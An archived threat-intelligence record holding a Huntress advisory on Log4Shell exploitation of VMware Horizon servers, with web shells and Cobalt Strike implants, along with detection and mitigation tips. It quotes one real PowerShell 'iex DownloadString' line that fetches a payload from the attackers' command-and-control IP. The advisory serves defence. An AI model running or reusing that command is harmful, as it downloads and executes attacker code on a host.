{
	"id": "88e74f56-30a9-427c-8da1-82b80eb34e76",
	"created_at": "2026-04-06T00:21:24.51623Z",
	"updated_at": "2026-04-10T13:11:53.059914Z",
	"deleted_at": null,
	"sha1_hash": "c326431297cd0ddc9ec1000d507bc1b19e417e65",
	"title": "VMware Horizon Servers Actively Being Hit With Cobalt Strike | Huntress",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 42700,
	"plain_text": "VMware Horizon Servers Actively Being Hit With Cobalt Strike | Huntress\r\nArchived: 2026-04-05 17:40:32 UTC\r\nOn January 5, the UK’s National Health Service (NHS) alerted that hackers were actively targeting Log4Shell vulnerabilities in VMware Horizon servers in an effort to establish persistent access via web shells. These web shells allow unauthenticated attackers to remotely execute commands on your server as NT AUTHORITY\\SYSTEM (root privileges). According to Shodan, ~25,000 Horizon servers are currently internet accessible worldwide.\r\nOur team is continuing to track this activity and this post will be updated with new information as it becomes available.\r\nImage Source: NHS - https://digital.nhs.uk/cyber-alerts/2022/cc-4002\r\nBased on Huntress’ dataset of 180 Horizon servers, we’ve validated NHS’ intel and discovered 10% of these systems (18) had been backdoored with a modified absg-worker.js web shell. It’s important to note that ~34% of the 180 Horizon servers (62) we analyzed were unpatched and internet-facing at the time of this publication. The web shells on these 18 compromised systems established a timeline that started on December 25, 2021 and continued until December 29, 2021.\r\nNew Behavior\r\nOn January 14 at 1458 ET, an unrelated Managed Antivirus detection (Microsoft Defender) tipped our ThreatOps team to new exploitation of the Log4Shell vulnerability in VMware Horizon. This time it was used to deliver the Cobalt Strike implant.\r\nAdditional security researchers including TheDFIRReport and Red Canary reported similar behavior around the same time—confirming a PowerShell-based downloader executed a Cobalt Strike payload that was configured to call back to 185.112.83[.]116 for command and control.\r\niex ((New-Object System.Net.WebClient).DownloadString('http://185.112.83[.]116:8080/drv'))\r\nAt 1938 ET, we started deploying Huntress’ soon-to-be-released Process Insights agent to all of the VMware Horizon servers we protect. This new EDR capability is based on an acquisition we made in early 2021 and allows us to proactively detect and respond to non-persistent malicious behavior by giving us the ability to collect detailed information about processes.\r\nInitial Access Source\r\nDespite mass exploitation of VMware Horizon to deliver web shells, our data suggests today's Cobalt Strike deployments were exploitation of Horizon itself and not the abuse of web shells. This conclusion is largely based on analysis of the PowerShell payload's parent process: web shell abuse spawns from node.exe, while exploitation of Log4Shell in Horizon spawns from ws_tomcatservice.exe, as pictured.\r\nDetection Tips\r\nFor those of you just learning about the mass exploitation of VMware Horizon servers and the installation of backdoor web shells, you should seriously consider the possibility that your server is compromised if it was unpatched and internet-facing. To help you determine your status, we strongly suggest you perform the following actions:\r\nRun VMware’s Horizon Mitigation tool to report whether there is a vulnerable Log4J library or child_process based web shell present under the installation location with the following command:\r\nHorizon_Windows_Log4j_Mitigation.bat /verbose\r\nManually inspect/assess the files within %ProgramFiles%\\VMware\\VMware View\\Server\\appblastgateway\\ for the presence of the child_process string as pictured here.\r\nReview historical records for evidence of node.exe or ws_TomcatService.exe spawning abnormal processes, including PowerShell.\r\nMitigation Steps\r\nThis new wave of coordinated hacking emphasizes the criticality of patching these servers immediately. VMware has produced detailed guidance to help you address these security vulnerabilities.\r\nShould you discover a web shell, VMware recommends you “take down the system and engage [an] Incident Response Team” to fully assess the compromise. Alternatively, Huntress recommends you restore from a backup prior to December 25 to remove the web shell. With that said, it’s entirely possible attackers exploited CVE-2021-44228 and CVE-2021-45046 to spread laterally within your network, so you should proceed with caution.\r\nSource: https://www.huntress.com/blog/cybersecurity-advisory-vmware-horizon-servers-actively-being-hit-with-cobalt-strike",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.huntress.com/blog/cybersecurity-advisory-vmware-horizon-servers-actively-being-hit-with-cobalt-strike"
	],
	"report_names": [
		"cybersecurity-advisory-vmware-horizon-servers-actively-being-hit-with-cobalt-strike"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434884,
	"ts_updated_at": 1775826713,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c326431297cd0ddc9ec1000d507bc1b19e417e65.pdf",
		"text": "https://archive.orkl.eu/c326431297cd0ddc9ec1000d507bc1b19e417e65.txt",
		"img": "https://archive.orkl.eu/c326431297cd0ddc9ec1000d507bc1b19e417e65.jpg"
	}
}